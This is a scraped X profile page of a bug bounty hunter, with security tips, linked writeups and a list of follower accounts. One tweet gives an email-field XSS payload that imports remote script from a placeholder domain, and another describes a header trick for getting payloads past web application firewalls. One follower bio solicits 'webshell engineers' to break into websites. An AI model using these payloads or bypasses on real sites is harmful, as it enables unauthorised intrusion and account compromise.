luffydragneel @Hackers_Guild
A full-time hacker + otaku. Level 5 SRT member. For any freelance pentest projects or invite to a private BB program, feel free to DM here :) luffydragneel.blogspot.com
Raftel
Joined December 2017
Tweets: 2K
Followers: 2K
Following: 277
Likes: 7K
Use NextJS? Recon Tip by renniepak A quick way to find "all" paths for Next.js websites: DevTools->Console console.log(__BUILD_MANIFEST.sortedPages) javascript:console.log(__BUILD_MANIFEST.sortedPages.join('\n')); #infosec #cybersec #bugbountytips
I have finally been recognized as an SRT legend. 😎Check my Acropolis profile here acropolis.synack.com/inductees/luff…. Thanks @SynackRedTeam for the amazing opportunity. #bugbounty
XSS in an email address is underrated. (email is rarely sanitized by companies). Use catch-all and then you can also verify your account (if required). "><img/src/onerror=import('//domain/')>"@YourDomain .com cc @BRuteLogic - brutelogic.com.br/blog/xss-limit…
Mad props to @rafabyte_'s debut security research on "Exploiting HTTP Parsers Inconsistencies" explaining how to bypass Nginx ACL Rules with Node.js, Flask and Spring Boot. Here's a 4 step guide based on his 5 months of research on how to exploit this.
I recently came across a weird case of cache deception vulnerability on a @SynackRedTeam target. I'm very excited to share the details with y'all. Also, I'm trying a new blog format this time. I hope you folks like it. Here you go: kuldeep.io/posts/web-cach…
The new Cookieless variant (CVE-2023-36560) has been added to soroush.me/blog/2023/08/c… @mwulftange 😇
Bug Bounty Tips: 🐛🌟 Want to excel in bug bounty hunting? Don't limit yourself to one program or asset. What if I told you that monitoring new assets and programs from various sources can increase your chances of success? 🚀
Here's a valuable list of sources to track all bug bounty platforms and assets:
1️⃣ Chaos Bug Bounty List - Explore public programs and self-hosted bug bounty program assets: 🔗 github.com/projectdiscove…
2️⃣ Bug Bounty Targets Data - Access programs and assets from bugcrowd, hackerone, hackenproof, intigriti, yeswehack, and more: 🔗 github.com/arkadiyt/bount…
3️⃣ bbscope - Utilize this awesome CLI tool to collect information about private program targets using your API: 🔗 github.com/sw33tLie/bbsco…
What can you do with this data? Here are some ideas:
1️⃣ Monitor these sources for new scope updates and receive notifications on Discord, Slack, or via email.
2️⃣ Establish an automated process to handle new targets, such as collecting subdomains and performing basic checks.
3️⃣ Identify interesting assets and start manual hunting to increase your chances of discovering bugs and reducing duplicates.
🕵️‍♂️ Follow these accounts for real-time scope updates:
1️⃣ h1disclosed - Twitter: 🔗 x.com/disclosedh1 - Get notifications on program launches and disclosed reports.
2️⃣ bbradar - Track all bug bounty programs at: 🔗 bbradar.io
3️⃣ inbbupdates - Twitter: 🔗 x.com/inbbupdates - Receive notifications on scope changes.
This dataset offers endless possibilities. Don't miss out on this opportunity, as many are already harnessing its potential. Elevate your bug bounty game today! 💪🔒 #hackerone #bugcrowd #cybersecurity #bugbountytips #securitytips #bounty #bounties #follow #motivation 🚀💡
Show & Tell: Exploiting an Unusual XXE Vulnerability on a Target App 🕵️♂️💻 1/ Often overlooked, XXE vulnerabilities can hide in plain sight, especially in apps seemingly devoid of XML calls to the backend. In this thread, I'll walk you through how I discovered and exploited such an issue in one of my pentest engagements.
Zendesk Takeover for fun and profit 😇 0xprial.com/the-art-of-zen… #BugBounty #BugBountyTips #TogetherWeHitHarder
#0day #research #bugbounty #informationsecurity blog.malicious.group/from-akamai-to… How I *AM* able to abuse Akamai to abuse F5, to abuse all of their customers. This is a bug chain that doesn't require a bug on the target domain to exploit them. But what do I know, I am a freelance nobody.
A very good writeup:- medium.com/@bug4y0u/how-i…
@asad0x01 @monkehack @kingcoolvikas @jayesh25 Working now 😊
@monkehack @kingcoolvikas @jayesh25 Is the link working for you?
@jayesh25 @pikaso_me screenshot this
🕵️♂️Here's another secret no one will tell you about: A Simple WAF Bypass for Stored XSS that has earned me $$$$💰 so far! Stored XSS issues can fetch you rewards ranging from $500 to $7500, depending on the program. WAFs can pose significant challenges when hunting for Stored XSS vulnerabilities, but this simple trick can help you bypass them. By adding 'Content-Encoding: any_random_text' to the request header, you can deceive some WAFs, allowing your payload to slip through undetected. Enjoy the hunt! #bugbounty #securityTips #ethicalhacking #WAFBypass #hackerOne #bugcrowd #bugbountytips
Very nice 🙏
This post is for all beginners who are stuck after solving @PortSwigger Academy. So I have just created a list (@hackthebox_eu) which u can refer to & follow after you are done with your basics from @PortSwigger & @PentesterLab. docs.google.com/spreadsheets/d…
You must sleep with this under your pillow to become good at web security: github.com/OWASP/wstg/rel…
301party.com: the intentionally open redirect #bugbountytip
@therceman Can you explain how it will help? I don't think it will help as the waf will still block it
Harsh Bothra @harshbothra_
43K Followers 755 Following Freelance Pentester & Consultant • Cobalt Core Lead & Pentester • Author • Speaker • Blogger • SecurityExplained • Project Bheem • Learn365 • Views are personal
Masonhck357 @Masonhck3571
16K Followers 820 Following 🔍 Top 100 Bug Bounty Hunter @ Bugcrowd | 🇩🇴 Dominican | Ethical hacking fanatic | 🎮🎵 Lover | Keeping the digital world safe. opinions are that of my own
Tuan Anh Nguyen⚡️... @haxor31337
16K Followers 2K Following 30 y/o Bug Bounty Hunter and Red Team Lead at Viettel Cyber Security. Brand Ambassador @Hacker0x01 - Researcher Spotlight @Bugcrowd
Ananda Dhakal @dhakal_ananda
11K Followers 734 Following Vulnerability Researcher @patchstackapp | Brand Ambassador @Hacker0x01 | Blogs: https://t.co/a0aOojdwyl 🇳🇵
Md Ismail Šojal... @0x0SojalSec
46K Followers 5K Following Cyber_Security_Re-searcher || Ai Re-searcher || AI-Sec|| Malware Analysis II iOS || Pwn || 0SINT || Project AI-StrikeSec || 0ldAccounts Suspended @0xSojalSec ||
Cinna_Bunna @BunnaCinna22581
6 Followers 41 Following This is the backup account of @TamarisLittle ! Age: 23!
⏔⏔⏔ ꒰ ᧔ෆ... @TamarisLittle
29 Followers 203 Following HII i might not be on twitter alot Age:🍓23🍓 my new account is: @BunnaCinna22581 I'm working on it a bit
KA @MHMMD_KLC
129 Followers 286 Following Cyber peacemaker. Offensive blog: https://t.co/w9HUfQDL4v, Defensive blog https://t.co/fde0yxtQQX, Telegram channel:
𝓡𝓘𝓢𝓚. @Risk7_
0 Followers 69 Following About me?: I am someone who plays chess against him/herself consistently | A very disgruntled person who faces his reality with sarcasm and indifference.
Abh1sh3k @Abh1s3c
110 Followers 626 Following 🐾 Security Researcher | Bug Bounty Hunter | Breaking bugs, not rules |Hunting bugs for coffee ☕ & bounties 💰
3m0n @em0n555
74 Followers 2K Following
_2051 @b8192051
11 Followers 473 Following
Frank @FrankYoumbi_
6 Followers 565 Following
Betty Mendoza @EliMarion190047
112 Followers 296 Following
Sourabh Das @SourabhDasPM
1 Followers 106 Following
Paulette May @may_paulet89131
1 Followers 171 Following Recruiting webshell engineers to penetrate websites, with a monthly salary of up to $100,000. If interested, please contact https://t.co/uDYMj2xiBT
tarantularifat @tarantularifat
2 Followers 855 Following
Amirali @Amirali_Kazi
0 Followers 106 Following
Piyush Kumar @SilverPoision
449 Followers 959 Following I craft weird ASCII patterns that make the internet panic.
bir hemşire @RSonmez38208
4 Followers 159 Following
Carlos Mayorga @Sud0Chul0
537 Followers 7K Following System Administrator | Fortinet | Azure | Entra | #cybersecurity
prasamsha @prasams89
12 Followers 1K Following
sad @sec0x25
66 Followers 3K Following
CyberRam @rnikadi001
4 Followers 294 Following
Vishal Gupta 🇮🇳 @HackerxTommy
137 Followers 4K Following •HACKER •Security Researcher @Hacker0x01 & @Bugcrowd •Bug Bounty Hunter #Ittakesacrowd #Wearehackerone
bugsploiterr @systempwn3d
27 Followers 2K Following
nanjin002 @nanjin00272827
12 Followers 4K Following
vaibhav Patil 🇮... @VaibhavPatil_9
3 Followers 60 Following
Muhammad Asad @Muhammad_AsadPk
92 Followers 1K Following eWPTXv3 | CRTA | CAP | SRT | VAPT | Penetration Tester | Offensive Security Engineer | Security Researcher #Alhumdulillah❤️
@tawanan90000 @tawanan90000
68 Followers 2K Following
renniepak @renniepakpur
292 Followers 305 Following
acecorvus 🇦🇷... @acecorvus
0 Followers 63 Following
xss0r @xss0r
7K Followers 3K Following xss0r Deploying an alert box in a web app is like having a tiny pop-up comedian shout 'Surprise!' whenever you least expect it! #xss0r #ibrahimXSS #Blindxss0r
Cybertection LLC (Jos... @Cybertection
438 Followers 7K Following Cybertection is your choice for all security software, but our specialty is always going to be antivirus software. We are your digital bodyguard.
NetworkMapper @NetworkMapper_
0 Followers 12 Following Diving deep into the world of hacking and cybersecurity | 15 days BugBounty Challenge
冰人v @ic23a3
38 Followers 2K Following 冰人v | Focused on AI entrepreneurship and one-person companies. Vive Coder & OPC Operator. "One person + AI = an army"
Jack Daniels @JackDaniel_1337
5 Followers 299 Following
jovial @grepNstep
345 Followers 7K Following Retweet ≠ endorsement. Trust those who seek the truth, doubt those who find it
JG @JackGil49730866
45 Followers 1K Following
Akash Dubey @aakashdubey06
16 Followers 377 Following
Kienzx203 @viet_kien16450
70 Followers 3K Following
hack3r_0 @0_hack3r
937 Followers 148 Following Sr. Cybersecurity Consultant | CAPen | ISO 27001 | SC-900 | MSc CyberSec | Computer Engineer | Top #20 @Intigriti 🇪🇸
Anuj Kurkure @anuj_kurkure
41 Followers 594 Following Cyber Security Enthusiast | Bug Bounty Hunter | Learner
Luigy0x18 🇪🇦 @luigy0x18
511 Followers 2K Following Security Pentester, Thread hunter, 🟣Team, sometimes developer and many other things. CEH|CRTP|AWS CCP
Intigriti @intigriti
211K Followers 668 Following Bug bounty & VDP platform trusted by the world’s largest organisations! 🌍
Sam Curry @samwcyo
101K Followers 1K Following
bugcrowd @Bugcrowd
200K Followers 6K Following The leading provider of crowdsourced cybersecurity solutions purpose-built to secure the digitally connected world...Unleash Ingenuity™
Ben Sadeghipour @NahamSec
248K Followers 1K Following Cofounder @hackinghub_io | Advisor @CaidoIO. I hack companies and make content about it. #NahamCon organizer. ex @hacker0x01🇮🇷
Yassine Aboukir 🐐 @Yassineaboukir
33K Followers 414 Following HackerOne Top 40, Elite, Pentest Lead, Ambassador, x2 MVH Title, $1 million bounties and ex- Hacker Advisory Board • Digital Nomad/Hybrid Athlete/Surfer
zseano @zseano
81K Followers 712 Following #1 Amazon Hacker. rebuilding bugbountyhunter and making bug bounties a better place for hackers. lover of hackbots
shubs @infosec_au
59K Followers 2K Following Co-founder, security researcher. Building an attack surface management platform, @assetnote
Julien | MrTuxracer... @MrTuxracer
39K Followers 441 Following Founder of @rcesecurity | #BugBounty | @Hacker0x01 MVH && H1-Elite | $1,5+ Mio in Bounties | Mobile Hacker | @[email protected]
Luke Stephens (hakluk... @hakluke
100K Followers 2K Following Hacker, marketer. I manage socials and marketing for cybersecurity orgs. Founder of @hacker_content and @haksecio
MorningStar @0xMstar
20K Followers 1K Following security researcher , bug bounty hunter ,bugcrowd top 10, co-founder https://t.co/1bT321Ayen, https://t.co/WqLPzN7PyL
HackerOne @Hacker0x01
338K Followers 3K Following HackerOne makes security continuous. We unite AI and human insight through a unified platform to expose risk and eliminate it.
Harsh Jaiswal @rootxharsh
22K Followers 1K Following Building @hacktronai | researching at @httpvoid0x2f | auditing at @cure53berlin | prev @zomato @vimeo @pdiscoveryio
Bug Bounty Reports Ex... @gregxsunday
54K Followers 613 Following Grzegorz Niedziela - a hacker who documents his hacking journey by creating and curating the best content about bug bounty and offensive security.
Busra @turakbusra
2K Followers 482 Following Independent Security Researcher | Bug Bounty Hunter | @SynackRedTeam 👩🏼💻
sudi @sudhanshur705
6K Followers 814 Following If there's non zero chance, the effort is infinite, anything is possible
Blaklis @Blaklis_
12K Followers 80 Following Security researcher - my research will be on https://t.co/2PnyCvqAIm Mostly inactive, soon replicated from BSKY.
Sharik Khan @4non_Hunter
4K Followers 349 Following A Proud INDIAN 🇮🇳 | Founder @bsidesmussoorie | Bugcrowd Ambassador | Application Security Researcher @bugcrowd | Full time Bug Bounty Hunter |
Bug Bounty Insights... @bbr_bug
5K Followers 27 Following Cybersecurity learning content. AI-assisted, expert-guided. Some posts are hypothetical for engagement. No bounties claimed, no spam.
elSec @adrielsec
4K Followers 390 Following 🧑💻🇧🇷 Author of 0 books, Cybersec Specialist at Undisclosed Companies and Security Researcher at @intigriti
Microsoft Security Re... @msftsecresponse
145K Followers 213 Following We are the Microsoft Security Response Center. To report security vulnerabilities or abuse in Microsoft products, visit https://t.co/kxEbdfMny1.
Awesome Google VRP Wr... @gvrp_writeups
3K Followers 0 Following Automatically tweeting new writeups from the GitHub repository "awesome-google-vrp-writeups".
Whispersmith @Whispersmith_n
1K Followers 0 Following Notify You About any update in tech field around the world
Jayesh Madnani @Jayesh25
14K Followers 505 Following Researcher in charge @ Ethical InfoSec Services | HackerOne Top 10 | https://t.co/JSX03Wv1vl
InfoSec Community @InfoSecComm
56K Followers 636 Following Largest InfoSec publication with 80,000+ followers and 3M+ monthly views.
H1 Disclosed - Public... @h1Disclosed
10K Followers 2 Following User friendly unofficial HackerOne public disclosures, keeps you updated about the recently disclosed bugs. Made With ♥ By Hackers For Hackers. - @rynosec
Critical Thinking - B... @ctbbpodcast
26K Followers 87 Following A 'by Hackers for Hackers' podcast focused on technical bug bounty content. Exploits, techniques, stories, bounties. Hosts: @rhynorater, @rez0__, @gr3pme
Emilien Socchi @emiliensocchi
746 Followers 134 Following Passionate security researcher and professional #EntraID #Azure #GCP #Kubernetes | Sharing technical tips and ideas
ReconOne @ReconOne_bk
21K Followers 54 Following Tweet about Bug Bounty, Recon, Recon Tips and Attack Surface Management.
Mehdi @silentgh00st
6K Followers 2K Following 🔎 Founder @mapperplus 🥷 Cyber Security Engineer 💻 Enthusiast ... --------------- OSCP-CRTO
0xor0ne @0xor0ne
92K Followers 508 Following Cybersecurity | Reverse Engineering | Vulnerability Research | Embedded & Silicon Security | My Tweets, My Opinions :)
A SLICE OF HISTORY @asIiceofhistory
310K Followers 10K Following The more you learn the more you realize how little you know🌻
Syed Mushfik Hasan Ta... @SMHTahsin33
5K Followers 352 Following Cyber Security Enthusiast | Learner | Free Time Bug Bounty Hunter | Ambitious | eWPTX, CRTO, ASCP | 21 Y/O | @bbcbd_official🇧🇩
Sivakumar @ladecruze
181 Followers 676 Following
Lucas Noki @0xPrototype
744 Followers 341 Following Welcome to the hot mess express🔥 Don't take anything you see around here too serious🎶 bbhunter-zprototype^
jkana101 @jkana101
2K Followers 454 Following Bug hunter | SRT | OSCP | CRTO | OSWE | OSEP | OSED | OSCE3
pry0cc @pry0cc
29K Followers 1K Following
Six2dez 🇵🇸 @Six2dez1
11K Followers 682 Following Bash lover | https://t.co/UoQ57OTS7f | reconFTW | RT lead @visma
Mustafa Can İPEKÇİ @mcipekci
9K Followers 489 Following I'm an engineer from Turkey, who is interested with biotechnology, computer science and digital gaming. Proud father of three little devils. A.K.A nukedx
Synack Red Team @SynackRedTeam
49K Followers 616 Following The power behind the @Synack platform is an elite team of the world's top cybersecurity researchers. Our best are honored at https://t.co/6bEAyp7HWJ
YesWeHack ⠵ @yeswehack
42K Followers 3K Following Offensive Security & Exposure Management Platform 🎯 https://t.co/57gODBqAMx 👾 https://t.co/ICc6RyihIX 💡 https://t.co/KNYxhkL2p1
Kuldeep Pandya @kuldeepdotexe
5K Followers 357 Following OSINT | Web | Binary | [email protected] | @SynackRedTeam Envoy && Hero
sellvamanoj @Tink2hack
673 Followers 2K Following Founder | CISO | SRT member | Yogosha member | OSCP | OSWP | ejPT | eWPT | eWPTx | CEH
RogueSMG @RogueSMG
9K Followers 1K Following Co-Founder @BarracksArmy | https://t.co/XXbeeUJ0Ht | Hacker Wannabe👨💻 | Ex-Null Ahmedabad Chapter Lead | SRT Top 200 | YouTube: https://t.co/HukfUSEvu2
Youstin @iustinBB
4K Followers 349 Following Bug Bounty https://t.co/zHVPVuGKCf https://t.co/yOdrIW1G71
Hannan Haseeb @HannanHaseeb11
1K Followers 870 Following Pentester @SecWallOfficial | Top 50 @YesWeHack | @SynackRedTeam Acropolis
Nikhil Mittal @nikhil_mitt
20K Followers 439 Following Hacker, Infosec Researcher, Military Affairs & History, PowerShell, AD and Azure pwner, Creator of Nishang and others :) Founder @alteredsecurity
Tuhin Bose @tuhin1729_
3K Followers 800 Following Security Researcher @cloudsek | Ex-BugBase | Bug Bounty Hunter | Penetration Tester | Freelancer | Speaker | Blogger | Krishna's Servant
Tirtha Mandal @tirtha_mandal
4K Followers 953 Following Hack All The Things || OSWE || https://t.co/YZ2iHkL35S Opinions are my own and not the views of my employer
Saugat Pokharel @saugatscript
3K Followers 227 Following I mostly find bugs on Facebook/Instagram. Some of my findings are featured on TechCrunch, The Verge, ThreatPost, Hak5 etc. I love Physics and Elon Musk.
Jaimin J Gohel 👨... @jaimin_gohel
1K Followers 542 Following Information Security Professional 💻 • Speaker 🎙️ • Scribbler ✍️ • CTFs 🚩
Nagli @galnagli
48K Followers 509 Following Hacker; Red Agent & Offensive AI at @wiz_io / @Google; $3,000,000 Bug Bounty Hunter and Live Hacking Events Winner.
COVID || NotApolitica... @NotApoliticalin
221 Followers 20 Following Female led youth initiative, trying to bring about change one word and action at a time.